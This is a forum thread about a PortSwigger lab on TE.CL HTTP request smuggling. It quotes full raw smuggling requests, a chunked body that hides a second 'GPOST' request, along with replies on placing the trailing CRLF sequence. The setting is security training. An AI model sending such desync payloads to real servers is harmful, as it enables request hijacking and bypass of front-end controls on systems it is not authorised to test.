HTTP Request Smuggling

In PortSwigger HTTP Requset lab, i got to send this request twice in order to do a basic TE.CL attack

POST / HTTP/1.1
Host: your-lab-id.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-length: 4
Transfer-Encoding: chunked

5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

x=1
0

But there is also a note writen:

You need to include the trailing sequence \r\n\r\n following the final 0.

Where i should put these sequence?

Tagged:

Comments

  • After the final 0?

    Hack The Box
    If you need help with something, PM me how far you've got already, what you've tried etc (I won't respond to profile comments). And remember to +respect me if I helped you ; )

  • edited October 9

    @clubby789 said:
    After the final 0?

    Like this?

    POST / HTTP/1.1
    Host: lab-id.web-security-academy.net
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 109
    Transfer-Encoding: chunked

    5c
    GPOST / HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 15

    x=1
    0\r\n\r\n

    but the response is:

    HTTP/1.1 400 Bad Request
    Content-Type: application/json; charset=utf-8
    X-Content-Type-Options: nosniff
    Connection: close
    Content-Length: 27
    {"error":"Invalid request"}

  • Rather like this:

    POST / HTTP/1.1
    Host: lab-id.web-security-academy.net
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 109
    Transfer-Encoding: chunked

    5c
    GPOST / HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 15

    x=1
    0

    Notice the two blank lines after the last 0, this is what they mean by \r\n\r\n.

Sign In to comment.